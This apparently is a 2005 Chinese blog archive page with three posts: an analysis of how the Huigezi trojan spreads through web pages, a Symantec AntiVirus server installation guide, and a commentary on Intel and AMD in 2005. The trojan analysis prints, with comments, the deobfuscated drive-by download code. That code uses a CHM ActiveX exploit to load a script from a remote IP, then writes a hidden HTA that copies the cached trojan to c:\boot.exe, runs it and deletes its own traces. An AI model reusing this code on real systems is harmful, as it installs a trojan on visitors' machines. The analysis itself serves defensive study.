Monthly Archives: December 2005

灰鸽子木马网页传播分析

最近中灰鸽子木马的人不少，分析一下灰鸽子的网页传播方式

黑鸽子会产生一个frame，如下：

<iframe src="http://www.qq.com/" width="800" height="600"></iframe> <script language=javascript>ie=’fucksnow’;ver=navigator.appVersion;if(!(ver.indexOf(‘NT 5.0′)==-1))ie=’nt’;if(!(ver.indexOf(‘Windows 98′)==-1)){ie=’98’;}location.href=ie+’.htm’;</script>

页面中嵌入的iframe是掩人耳目的，重要的不是ifrme部分，而是后面的javascrpit部分

<iframe src="http://www.qq.com/" width="800" height="600"></iframe>   //掩人耳目
<script language=javascript>
ie=’fucksnow’;                //定义变量ie=fucksnow
ver=navigator.appVersion;   //获得浏览器版本
if(!(ver.indexOf(‘NT 5.0′)==-1)) ie=’nt’;      //如果是2k系统则ie=nt
if(!(ver.indexOf(‘Windows 98′)==-1)) {ie=’98’;}   //定义变量ie=98
location.href=ie+’.htm’;    //重定向到 ie+’.htm’
</script>

佩服作者的细心，这三个htm：98.htm nt.htm 和fucksnow.htm只有一个地方不同，就是利用的chm文件的所在位置不一样，作者根据98 2k和 xp的帮助文件位置不同设置了几个不同的运行条件，从这方面看作者到做的非常好，比国内很多的软件商都要好得多

我们以fucksnow.htm为例做分析：如果直接查看fucksnow.htm的源代码可以看到里面似乎是乱码，其实不然，这是利用了IE解析Html代码的时候忽略空格的特性。我们把里面所有的空格去掉，再稍微整理，就可以看到下面的代码了（空格都被去掉了，代码有点乱）。

<SCRIPTlanguage=VScriptsrc="mmmmm.gif"></SCRIPT> //加载mmmmm.gif，这个其实不是图片，后面会说到
<SCRIPTlanguage=VScriptsrc="xxxxx.pif"></SCRIPT> //加载xxxxx.pif，灰鸽子木马
<HTML><BODY>
<divstyle="display:none">
//利用chm漏洞
<OBJECTid="news140"type="application/x-oleobject"classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"><PARAMname="Command"value="RelatedTopics,MENU"><PARAMname="Window"value="$global_ifl">
<PARAMname="Item1"value=’command;/windows/help/apps.chm’);</OBJECT>
<OBJECTid="news162"type="application/x-oleobject"classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"><PARAMname="Command"value="RelatedTopics,MENU"><PARAMname="Window"value="$global_ifl">
//利用chm漏洞执行mmmmm.gif里面的脚本程序
<PARAMname="Item1"value=’command;javascript:eval("document.write("<SCRIPTlanguage=JScriptsrc="http://218.106.9.136/inc/mmmmm.gif""+String.fromCharCode(62)+"</SCR"+"IPT"+String.fromCharCode(62))")’>
</OBJECT>
</div>
<SCRIPT>news140.Click();f1=1+1;f1=f1+2;setTimeout("news162.Click();",0);fu1=2;fu1=3+4;</SCRIPT></BODY></HTML>
//又是一个障眼法，重定向到http://xuemulove.com/a.gif，文件不存在
<iframesrc="http://xuemulove.com/a.gif"width="0"height="0">
</iframe><BODYonload="window.status=’页面已装载!’">

mmmmm.gif分析：代码隐藏原理和fucksnow.htm一样，替换掉空格后看到以下代码

document.write(‘<html><HEAD><SCRIPTlanguage=JScript>window.moveTo(4000,4000);window.resizeTo(0,0);</SCRIPT></HEAD></html>’);    //把弹出窗口移到x,y=4000,4000的位置，另你看不到
//利用ADODB写文件
try{BOSSYU=newActiveXObject("ADODB.Recordset");BOSSYU.Fields.Append("a",200,3000);BOSSYU.Open();BOSSYU.AddNew();BOSSYU.Fields("a").Value="
//写进去的代码
<HTML><BODYonLoad="window.moveTo(4000,4000);">
<HEAD><SCRIPTlanguage=JScript>window.moveTo(4000,4000);window.resizeTo(0,0);</SCRIPT></HEAD>
//利用HTA执行所需要的操作
<HTA:APPLICATIONID=kk3714CAPTION="no"BORDER="none"HEIGHT="0"SHOWINTASKBAR="no"WIDTH="0">
<BODYscroll="no"leftmargin="0"topmargin="0"marginwidth="0"marginheight="0">
<SCRIPTLANGUAGE="JavaScript">
//在打开fucksnow.htm的时候已经加载了xxxxx.pif文件，这时该文件已经在IE的缓存中。由于IE的一些特性，该文件会被保存为xxxxx[1].pif xxxxx[2].pif等类似的文件名，下面的程序子就是为了把他找出来，并执行他
function thanks(b){
try{
varc=new Enumerator(YUri.GetFolder(b).SubFolders);
for(;!c.atEnd();c.moveNext())
{var zI01=c.item().Path+"xxxxx[1].pif";
var z1=c.item().Path+"xxxxx[2].pif";
var f="C:boot.exe";
if(YUri.FileExists(zI01))     //找到木马文件xxxxx[1].pif
{YUri.CopyFile(zI01,f)     //copy到 c:boot.exe
w00sh.Run(f,0,false);      //执行木马
v=1;break;}
if(YUri.FileExists(z1))        //同上，只不过文件名为xxxxx[2].pif
{YUri.CopyFile(z1,f);
w00sh.Run(f,0,false);
v=1;break;}
thanks(c.item());}}
catch(e){}}
function agree(){
path="c:boOt.bat";     //建立boot.bat批处理
v=kk3714.commandLine;
v=v.substring(1,v.length-2);
var_w=YUri.CreateTextFile(path);
_w.Write(‘@eCho oFf rn:ArnDeL"’+v+’"rnifeXiSt"’+v+’"gOtoArnDEl%0′);   //写命令到boot.bat里面，BAT里面的内容：
====================
@echo off
:a del v     //删除v , v为该执行文件c:bootlog.hta
if exist v goto a   //如果还没删除则转到 a，继续执行删除操作
del 0%    //自删除
====================
_w.close();
w00sh.Run(path,0,false);
window.close();
}
//获得IE缓存存放位置以查找xxxxx.pif
varv=0;
try{
varYUri=newActiveXObject("Scripting.FileSystemObject");
varw00sh=newActiveXObject("WScript.Shell");
varcache=w00sh.RegRead("HKCUSoftwareMicrosoftWindowsCurrentVersionExplorerShellFoldersCache");
}catch(e){}
function fish()
{try{if(v==0){thanks(cache+’..’);setTimeout("fish()",4000);}else{agree();}}catch(e){}}
fish();</SCRIPT></BODY></HTML>";
//存为c:bootlog.hta并执行
BOSSYU.Update();}catch(e){}try{BOSSYU.Save("c:bootlog.hta",0);}catch(e){}document.write(‘<objectid="bbs1"type="application/x-oleobject"classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"><paramname="Command"value="shortcut"><paramname=item1value=",c:bootlog.hta"></object>
<OBJECTid="bbs2"type="application/x-oleobject"classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"><paramname="Command"value="Close"><paramname=kav"value="out"></oBjEct>
<ScRipt>c=1;bbs1.Click();c=1;c=c+5;bbs2.Click();c=c+1;</script>’);

基本上是利用了chm漏洞，如果系统打过所有补丁是不会中招的；临时禁用java script也可以防止。

Symantec AntiVirus防病毒服务器安装配置使用指南

2 Replies

放入Symantec AntiVirus安装光盘自启动（或点击应用程序setup）后，选择“安装管理员工具”。如下图所示。

再选择“安装Symantec系统中心”。如下图所示。

下一步，安装Symantec System Center。如下图所示

安装完成后请重新启动操作系统。如下图所示。

重新启动操作系统后运行Symantec系统中心控制台。如下图所示。

在Symantec系统中心控制台，选择“工具”→“AV服务器分装”。如下图所示。

下一步，安装Symantec AntiVirus服务器。如下图所示。

下一步，选择计算机，将网络里的计算机添加到目标计算机中。如下图所示。
***注意这里您的计算机必须要联接网络***

下一步，键入您要建立的Symantec AntiVirus服务器组名称。如下图所示。

输入Symantec AntiVirus服务器组的密码。如下图所示。

下一步，选择服务器程序的运行方式。如下图所示。

完成安装进度后，点击关闭后AV服务器就分装完毕。如下图所示。

在Symantec系统中心控制台，选择“工具”→“搜索服务”。如下图所示。

在“搜索服务”属性里选择“立即清除缓存信息”确定，将您建立的Symantec AntiVirus服务器组名称搜索出来。如下图所示。

在Symantec系统中心控制台，选择您建立的Symantec AntiVirus服务器组名称，点击鼠标右键选择“解除服务器组的锁定”。如下图所示。

在Symantec系统中心控制台，选择您建立的Symantec AntiVirus服务器组名称，点击鼠标右键选择“使服务器成为一级服务器”。如下图所示。

在Symantec系统中心控制台，选择您建立的Symantec AntiVirus服务器组名称，点击鼠标右键选择“所有任务”→“Symantec AntiVirus” →“客户端管理员专用选项”及“服务器调整选项”，根据您的要求定义。如下图所示。

关于使用Web在线安装方式：
需要在Symantec AntiVirus防病毒服务器上安装IIS服务，在“默认网站”点击鼠标右键选择“新建”→“虚拟目录”。如下图所示。

创建虚拟目录完成后，需要在IIS中的 MIME类型里注册一下.ini和.dat文件扩展名。否则Web在线安装时会提示文件下载错误! 如下图所示。

完成IIS配置后，编辑服务器上的C:Program FilesSAVCLT-INSTWEBINST文件夹的start.htm文件，将VALUE=www.servername.com改为您的服务器地址，将VALUE="webinstall"改为您的服务器虚拟目录。如下图所示。

将服务器上C:Program FilesSAVCLT-INSTWIN32文件夹里的文件拷贝到C:Program FilesSAVCLT-INSTWEBINSTwebinst目录里，修改files.ini文件。
举例：
[General]
FileCount=8
LaunchApplication=Setup.exe
InstallOptions=/s /v"/qb"
[Files]
File1=GRC.DAT
File2=Setup.exe
File3=Setup.ini
File4=Data1.cab
File5=0x0804.ini
File6=VDefHub.zip
File7=instmsiw.exe
File8=Symantec AntiVirus.msi

完成Symantec AntiVirus防病毒服务器所有配置后，客户端安装只需打开浏览器输入http://服务器地址/虚拟目录/就可进行Web方式在线安装。如下图所示。

2005：Intel不知所措的一年

Leave a reply

2005年，Intel除了为我们带来了一大堆令人困惑的处理器编号外，就只是祈祷AMD不要夺走太多的市场份额了，而事实证明这也仅仅是希望。今年AMD大步入侵Intel的服务器市场领地，并且还将把这种势头保持到明年。

AMD今年再也不像以前那样在台式机CPU市场和Intel纠缠，而是将矛头直指老大哥的咽喉——服务器处理器市场，并且也成功地在这一领域对Intel造成了巨大的冲击，尽管这是以损失销售收入为代价。

在笔记本市场方面，AMD也继续向Intel发起挑衅。尽管其“Turion”笔记本处理器在CES大展上出尽风头，但到了5月份相关产品才真正面世，而Intel这时也坐不住了，终于做出了今年仅有的几件实事，这其中当然不包括其战略图上仍然保留Itanium。

5月初，Intel开始着手处理器的65nm制程转换工作，同时还确认将用Pentium M来取代Pentium 4。

接下来，人们发现Opteron是如此轻松地干掉Intel Xenon，某厂商甚至预测到2005年底，AMD将获得15%的服务器处理器市场份额。

而在5月份的“Gartner System Builder Summit”大会上，服务器主板厂商超微确信AMD的Opteron处理器已经流行起来，其Opteron主板也成为会上的明星。某知名厂商甚至透露Intel根本不敢在高性能计算机（HPC）领域和AMD叫板。

随后在旧金山，Intel透露了“Napa”的技术细节，并且宣布Yonah将于明年早期面世。8月份，Intel又为我们描绘了“Montecito”的美好图景，但这一切都无法阻止Itanium这一昔日旗舰的覆灭。

到目前为止，Intel仍然继续获取着巨额利润，同时也无疑仍是笔记本市场的霸主，不过我们对AMD Opteron在明年的表现寄予厚望，而Intel现在只能寄希望于Yonah，Merom等等新核心处理器。至于明年1月份即将出现的Viiv，Intel目前正忙着劝说消费者：不管Pentium 4“芯”还是Pentium M“芯”，只要是Viiv就是好“机”。